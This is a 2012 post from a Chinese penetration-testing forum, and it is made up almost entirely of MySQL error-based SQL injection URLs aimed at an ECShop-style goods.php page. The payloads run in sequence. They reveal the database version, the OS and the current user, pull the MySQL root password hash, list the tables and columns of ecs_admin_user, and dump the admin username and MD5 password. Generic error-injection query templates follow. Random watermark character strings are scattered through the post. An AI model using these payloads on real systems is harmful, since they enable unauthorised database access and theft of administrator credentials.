找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2923|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 9 O2 d1 P" p* D; A
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ Y1 l: L0 ^6 R  v  V2 O1 ]

9 u5 a. ^3 p6 e- l5 f6 J判断系统
+ l: {. [, S  f. c9 B7 \
+ B- j7 o2 G1 yhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: o, s' u; C2 [1 y( s. U+ M# p6 Q

% N, H7 r- C3 Q( {4 u8 I
2 |2 C1 g* L9 ^* D5 F- x0 |, h. |* ]5 D) }+ r
当前 user()( u- I; S& n2 Y% F
( z8 D, N* N$ f3 y) C- F( P
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 X: K7 Y3 u0 C; k. ~& k- E  e1 u0 ?! o
% o" s# m$ j! _/ t7 A

0 ?. S) @) {8 L. L/ b当前 database()( z. c( X5 k* G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%239 X- h% `' x  F& e0 Q
: G9 W) S8 _. ]

4 R& \/ e: ^) T, [
0 ^4 D0 l8 H' ?& _. c8 B
0 w1 }  Q3 X/ \: |: jroot hash
% {  B- R* X7 S# ]7 d' x6 T- [& @- q1 k* @
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
( l! v4 R; ?" @. K/ [, b/ _1 T3 a6 W+ c
" U/ E$ {+ \* k4 M! c+ W: u

3 X) w6 F1 M# r2 H2 }) T当前 数据库表名
( l4 F8 G; Q7 a  k. \
9 \1 N1 b5 F0 q( hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
1 }6 K" _0 b; o  L" z! c( {. D6 \* R; r. }: z$ c0 c4 G

4 z7 F1 t. l7 @. G( H4 I
9 b* X+ @# q4 S% U: _# Z8 }. m7 y当前 数据库 user_name 字段
  S- v: u+ A; C: J& P2 K# c' y1 D& E7 w* R
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 U5 `2 }* Y. Z! Z
2 C3 X# f: Z+ R; v
当前 数据库 字段 password. k" g! [9 \" h: f
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 }6 Z' g: s# w* I4 \9 Q6 [4 I2 m) I0 g6 H- O+ T9 X: z; k

0 H, B" @% j" K4 h- W  Y! |6 f1 Z& m! m0 Z" D
获得 admin passwd(md5)
3 I" d2 Z# ~4 r' m3 k; F5 t3 F1 {$ ]# |+ L, V/ D. V3 P. F# F, l
: D7 Y$ r$ B% e1 E. _) L
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 r- j7 `/ ?; M7 D; k9 q
: \; M- R8 H1 `- N
报错注射
% J' R+ ]" I% q! f/ I) eSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
" F$ z9 }( i4 S/ Y' p
( u3 [' @: g* ?. l; CSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)  j. l# n" _1 O$ n/ Y' |8 r
: p! O0 Z# x4 B8 d  t0 Q, x
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表